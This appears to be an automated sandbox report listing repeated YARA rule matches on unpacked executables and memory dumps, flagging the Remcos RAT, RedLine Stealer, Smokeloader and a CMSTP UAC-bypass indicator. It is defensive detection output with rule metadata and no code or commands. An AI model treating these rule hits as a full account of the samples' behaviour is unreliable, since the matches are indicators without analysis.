Source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000018.00000002.1779032032.0000000000A21000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1754203056.000000000089C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2515260424.0000000000B7B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000023.00000002.1789635981.00000000009B1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
